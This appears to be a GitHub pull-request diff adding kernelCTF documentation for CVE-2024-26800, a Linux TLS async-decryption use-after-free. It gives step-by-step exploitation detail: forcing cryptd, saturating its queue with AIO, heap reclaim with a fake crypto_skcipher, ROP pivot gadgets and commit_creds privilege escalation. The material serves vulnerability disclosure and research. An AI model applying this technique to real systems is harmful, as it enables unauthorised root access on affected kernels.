Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
186 changes: 186 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-26800_cos/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,186 @@
## Setup

### TLS setup
To trigger the TLS encryption we must first configure the socket.
This is done using the setsockopt() with SOL_TLS option:

```
static struct tls12_crypto_info_aes_ccm_128 crypto_info;
crypto_info.info.version = TLS_1_2_VERSION;
crypto_info.info.cipher_type = TLS_CIPHER_AES_CCM_128;

if (setsockopt(sock, SOL_TLS, TLS_TX, &crypto_info, sizeof(crypto_info)) < 0)
err(1, "TLS_TX");

```

This syscall triggers allocation of TLS context objects which will be important later on during the exploitation phase.

In KernelCTF config PCRYPT (parallel crypto engine) is disabled, so our only option to trigger async crypto is CRYPTD (software async crypto daemon).

Each crypto operation needed for TLS is usually implemented by multiple drivers.
For example, AES encryption in CBC mode is available through aesni_intel, aes_generic or cryptd (which is a daemon that runs these basic synchronous crypto operations in parallel using an internal queue).

Available drivers can be examined by looking at /proc/crypto, however those are only the drivers of the currently loaded modules. Crypto API supports loading additional modules on demand.

As seen in the code snippet above we don't have direct control over which crypto drivers are going to be used in our TLS encryption.
Drivers are selected automatically by Crypto API based on the priority field which is calculated internally to try to choose the "best" driver.

By default, cryptd is not selected and is not even loaded, which gives us no chance to exploit vulnerabilities in async operations.

However, we can cause cryptd to be loaded and influence the selection of drivers for TLS operations by using the Crypto User API. This API is used to perform low-level cryptographic operations and allows the user to select an arbitrary driver.

The interesting thing is that requesting a given driver permanently changes the system-wide list of available drivers and their priorities, affecting future TLS operations.

Following code causes AES CCM encryption selected for TLS to be handled by cryptd:

```
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "skcipher",
.salg_name = "cryptd(ctr(aes-generic))"
};
int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0);

if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0)
err(1, "af_alg bind");

struct sockaddr_alg sa2 = {
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))"
};

if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa)) < 0)
err(1, "af_alg bind");
```

### User API crypto setup

We'll also use the crypto user API to execute symmetric key cipher operations handled by cryptd.
User API has a more complex setup sequence compared to the TLS.

We need to:
1. Create an AF_ALG socket
2. Bind the sockaddr_alg structure to select the crypto type (skcipher, aead, hash etc) and the algorithm.
3. Call setsockopt with ALG_SET_KEY to set the key.
4. Call accept() on the socket to get the socket that will be used for the actual crypto ops.
5. Call sendmsg() with a prepared message that will contain the message to be encrypted/decrypted, but also a control message selecting the mode (decryption/encryption) and the IV for the operation.
6. Finally recvmsg() is called to trigger the actual crypto operation and get the results.

## Reaching the queue limit of cryptd.

The default queue limit (cryptd.cryptd_max_cpu_qlen) is 1000.
The naive way to reach it would be to just make a lot of TLS or crypto API requests with sendmsg/recvmsg, but we will quickly learn that this is approach is useless, because on each return from the kernel the cryptd will be scheduled and will be process one of our requests, so the queue size will stay basically constant.

We need a way to submit crypto requests without leaving the kernel. This can be done using iouring, but this is disabled on kernelCTF LTS instances.
Instead we'll use a less known async subsystem of the kernel called AIO.
It's much simpler than iouring and only supports read/write/poll/fsync operations, but this is enough for our uses.

Using AIO is very simple, we just need to define operations to be made by using a list of io_cb structures and pass it to io_submit().

To reach the queue limit we just prepare over 1000 user crypto api encryption requests.
User API requests do not set the CRYPTO_TFM_REQ_MAY_BACKLOG flag, so requests over the limit will just be rejected instead of going into backlog mode.
This way we don't have to worry about triggering the vulnerability prematurely.

## Triggering the use-after-free

When the cryptd queue is at the max capacity we just have to call recvmsg() on our TLS socket and this will put our request on the cryptd's backlog.
crypto_aead_decrypt() will return EBUSY and tls_do_decryption() will wait for the completion of decryption work.
If data sent over the TLS sock is not a valid ciphertext, tls_do_decryption() will return EBADMSG and by that time tls_decrypt_done() would have already freed the AEAD request allocated in tls_decrypt_sg().

tls_decrypt_sg() tries to call kfree() on the AEAD request, triggering a double-free protection if no other allocation from the same cache will be made after kfree() in tls_decrypt_done().

## Allocating our payload in place of the AEAD request

crypto_aead_decrypt() queues decryption in cryptd and returns to tls_do_decryption() which calls tls_decrypt_async_wait() to wait for the completion of the decryption work.
cryptd uses per-CPU workers and each worker is a separate kernel thread. Work is done on the same CPU that was used to queue the request.
When decryption is finished cryptd worker calls tls_decrypt_complete() which calls complete() waking up the thread waiting in tls_decrypt_async_wait().
However, complete() only wakes the waiting process, the scheduler decides which process to switch to after cryptd finishes its work.

To get a chance to run our userspace code right after tls_decrypt_complete(), we reduce the priority of the main process that called
io_submit() by calling nice(19) after cloning a separate child process to make the allocation.

The child process uses io_getevents() to synchronize with the AIO state and uses a user key payload primitive to allocate from kmalloc-1k (the cache that was used to allocate AEAD request in tls_decrypt_sg().

When tls_decrypt_sg() runs after tls_decrypt_async_wait() it will free our recently allocated key payload, creating a use-after-free on our object.


## Allocating a better victim object for RIP control.

User key payload doesn't give us a direct RIP control option, so we need something to allocate from kmalloc-1k.
We used a crypto_skcipher object that contains a crypto_tfm which has a pointer to the skcipher_alg object that contains useful function pointers.
crypto_skcipher is allocated when bind() is called on a crypto user API socket and skcipher crypto type is selected.

After binding the socket, we remove the user key payload (freeing the crypto_skcipher) and allocate from kmalloc-1k again to overwrite crypto_skcipher with our fake object.
Netlink skb allocation primitive is chosen here to be able to use the space from the very beginning of the buffer.

The only field in crypto_skcipher required for exploitation is struct skcipher_alg pointer - we need to a place to craft this object under a known kernel space address. For this we used the cpu_entry_area technique.

```
struct skcipher_alg {
int (*setkey)(struct crypto_skcipher *, const u8 *, unsigned int); /* 0 0x8 */
int (*encrypt)(struct skcipher_request *); /* 0x8 0x8 */
int (*decrypt)(struct skcipher_request *); /* 0x10 0x8 */
int (*init)(struct crypto_skcipher *); /* 0x18 0x8 */
void (*exit)(struct crypto_skcipher *); /* 0x20 0x8 */
unsigned int min_keysize; /* 0x28 0x4 */
unsigned int max_keysize; /* 0x2c 0x4 */
unsigned int ivsize; /* 0x30 0x4 */
unsigned int chunksize; /* 0x34 0x4 */
unsigned int walksize; /* 0x38 0x4 */
struct crypto_alg base __attribute__((__aligned__(8))); /* 0x40 0x180 */
/* size: 448, cachelines: 7, members: 11 */
};
```

We only need to set 3 fields to be able to trigger a function pointer call:
1. .setkey
2. min_keysize
3. max_keysize


## Getting RIP control

To trigger a call to .setkey we need to call setsockopt ALG_SET_KEY on our crypto API socket.

## Pivot to ROP

.setkey function is called with the pointer to crypto_skcipher in the RDI.

Three gadgets are needed to pivot to the ROP chain:

```
mov r8, qword ptr [rdi + 0xc8]
mov eax, 1
test r8, r8
je 0xffffffff81ed2b71
mov rsi, rdi
mov rcx, r14
mov rdi, rbp
mov rdx, r15
call __x86_indirect_thunk_r8
```

which copies RDI to RSI

```
push rsi
jmp qword ptr [rsi + 0x66]
```

and
```
pop rsp
```

## Second pivot

At this point we have full ROP, but our space is limited.
To have enough space to execute all privilege escalation code we have to pivot again.
This is quite simple - we choose an unused read/write area in the kernel and use copy_user_generic_string() to copy the second stage ROP from userspace to that area.
Then we use a `pop rsp ; ret` gadget to pivot there.

## Privilege escalation

The second stage of the ROP does the standard commit_creds(init_cred); switch_task_namespaces(pid, init_nsproxy); sequence and returns to the userspace.
84 changes: 84 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-26800_cos/docs/vulnerability.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,84 @@
## Requirements to trigger the vulnerability

- Kernel configuration: CONFIG_TLS and CONFIG_CRYPTO_CRYPTD
- User namespaces required: no

## Commit which introduced the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8590541473188741055d27b955db0777569438e3

## Commit which fixed the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=13114dc5543069f7b97991e3b79937b6da05f5b0

## Affected kernel versions

Introduced in 6.6.18 and cos-109-17800-147-54. Fixed in 6.6.20 and cos-109-17800-218-20.

## Affected component, subsystem

net/tls

## Description

When TLS submits a decryption request in async mode to the crypto API, this request is handled by cryptd and number of queued requests exceeds the maximum queue size (cryptd.cryptd_max_cpu_qlen) the API will enter "backlog mode" and crypto_aead_decrypt() will return EBUSY in tls_do_decryption():

```
static int tls_do_decryption(struct sock *sk,
struct scatterlist *sgin,
struct scatterlist *sgout,
char *iv_recv,
size_t data_len,
struct aead_request *aead_req,
struct tls_decrypt_arg *darg)
{
...

ret = crypto_aead_decrypt(aead_req);

if (ret == -EBUSY) {
ret = tls_decrypt_async_wait(ctx);
ret = ret ?: -EINPROGRESS;
}
if (ret == -EINPROGRESS) {
if (darg->async)
return 0;

ret = crypto_wait_req(ret, &ctx->async_wait);
}
darg->async = false;

return ret;
}


tls_do_decryption() will then wait for the completion of the decryption work and if there was an error (e.g. invalid ciphertext causing EBADMSG) this error will be returned to the caller:

```
static int tls_decrypt_sg(struct sock *sk, struct iov_iter *out_iov,
struct scatterlist *out_sg,
struct tls_decrypt_arg *darg)
{
...
err = tls_do_decryption(sk, sgin, sgout, dctx->iv,
data_len + prot->tail_size, aead_req, darg);
if (err)
goto exit_free_pages;

...

exit_free_pages:
/* Release the pages in case iov was mapped to pages */
for (; pages > 0; pages--)
put_page(sg_page(&sgout[pages]));
exit_free:
kfree(mem);
exit_free_skb:
consume_skb(clear_skb);
return err;
}

```

Error returned from tls_do_decryption() will cause tls_decrypt_sg() to free sgout pages and AEAD request object (mem), like it would do to handle error in the non-async mode.
The problem is that in async mode tls_decrypt_done() already freed these items, resulting in a use-after-free/double-free vulnerability.
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
INCLUDES =
LIBS = -pthread -ldl -laio
CFLAGS = -fomit-frame-pointer -static -fcf-protection=none

exploit: exploit.c kernelver_17800.147.60.h kaslr.c
gcc -o $@ exploit.c kaslr.c $(INCLUDES) $(CFLAGS) $(LIBS)

prerequisites:
sudo apt-get install libkeyutils-dev libaio-dev
Binary file not shown.
Loading